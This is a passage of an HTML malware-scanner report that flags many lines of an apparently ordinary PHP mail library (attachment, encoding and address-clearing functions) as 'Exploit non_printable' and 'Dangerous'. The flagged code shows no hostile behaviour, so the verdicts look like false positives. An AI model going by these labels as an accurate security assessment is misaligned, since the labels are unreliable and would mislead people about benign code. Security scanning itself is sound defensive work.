</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2800</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addAttachment</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">= </span><span style="color: #DD0000">'base64'</span><span style="color: #007700">, </span><span style="color: #0000BB">$type </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$disposition </span><span style="color: #007700">= </span><span style="color: #DD0000">'attachment'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2840</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the </span><span style="color: #007700">array </span><span style="color: #0000BB">of attachments</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2843</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getAttachments</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2845</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">attachment</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2856</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">attachAll</span><span style="color: #007700">(</span><span style="color: #0000BB">$disposition_type</span><span style="color: #007700">, </span><span style="color: #0000BB">$boundary</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2858</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">text of body</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2954</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2969</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">implode</span><span style="color: #007700">(</span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$mime</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2981</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeFile</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">= </span><span style="color: #DD0000">'base64'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2996</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returns false in 5.4</span><span style="color: #007700">+</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 29</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafClear</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">,</span><span style="color: #0000BB">$email</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3010</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$file_buffer</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3025</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeString</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">= </span><span style="color: #DD0000">'base64'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3050</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$encoded</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3061</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$position </span><span style="color: #007700">= </span><span style="color: #DD0000">'text'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3070</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">$encoded</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3072</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #DD0000">"\"</span><span style="color: #0000BB">$encoded</span><span style="color: #DD0000">\""</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3089</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">$str</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3097</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'mb_strlen'</span><span style="color: #007700">) && </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">hasMultiBytes</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3098</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">which correctly encodes </span><span style="color: #007700">and </span><span style="color: #0000BB">wraps long</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3125</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">hasMultiBytes</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3127</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'mb_strlen'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3128</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">) > </span><span style="color: #0000BB">mb_strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">CharSet</span><span style="color: #007700">));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3129</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions anyway</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3139</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">has8bitChars</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3141</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span><span style="color: #DD0000">'/[\x80-\xFF]/'</span><span style="color: #007700">, </span><span style="color: #0000BB">$text</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3147</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">by paravoid</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3148</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">mb</span><span style="color: #007700">-</span><span style="color: #0000BB">encode</span><span style="color: #007700">-</span><span style="color: #0000BB">mimeheader</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #FF8000">#60283</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3154</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">base64EncodeWrapMB</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$linebreak </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3194</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">quoted</span><span style="color: #007700">-</span><span style="color: #0000BB">printable</span><span style="color: #007700">-</span><span style="color: #0000BB">decode</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #FF8000">#89417 Adapted from this comment</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3196</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeQP</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">, </span><span style="color: #0000BB">$line_max </span><span style="color: #007700">= </span><span style="color: #0000BB">76</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3198</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function if </span><span style="color: #0000BB">it</span><span style="color: #DD0000">'s available (>= PHP5.3)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3199</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'quoted_printable_encode'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3200</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">quoted_printable_encode</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3208</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">preg_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">'/[^\r\n]{' </span><span style="color: #007700">. (</span><span style="color: #0000BB">$line_max </span><span style="color: #007700">- </span><span style="color: #0000BB">3</span><span style="color: #007700">) . </span><span style="color: #DD0000">'}[^=\r\n]{2}/'</span><span style="color: #007700">, </span><span style="color: #DD0000">"$0=\r\n"</span><span style="color: #007700">, </span><span style="color: #0000BB">$string</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3212</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that was removed</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3221</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeQPphp</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3226</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">encodeQP</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">, </span><span style="color: #0000BB">$line_max</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3237</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeQ</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$position </span><span style="color: #007700">= </span><span style="color: #DD0000">'text'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3274</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">str_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">' '</span><span style="color: #007700">, </span><span style="color: #DD0000">'_'</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoded</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3288</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addStringAttachment</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3327</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean True on successfully adding an attachment</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3329</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addEmbeddedImage</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$cid</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">= </span><span style="color: #DD0000">'base64'</span><span style="color: #007700">, </span><span style="color: #0000BB">$type </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$disposition </span><span style="color: #007700">= </span><span style="color: #DD0000">'inline'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 335</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return-</span><span style="color: #0000BB">Path</span><span style="color: #007700">) </span><span style="color: #0000BB">of the message</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3374</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addStringEmbeddedImage</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3406</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">inlineImageExists</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3420</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">attachmentExists</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 342</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return-</span><span style="color: #0000BB">Path of the message</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3434</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">alternativeExists</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3436</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return !empty(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">AltBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3445</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearQueuedAddresses</span><span style="color: #007700">(</span><span style="color: #0000BB">$kind</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3459</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 345</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return-</span><span style="color: #0000BB">path header</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3472</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearCCs</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3485</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
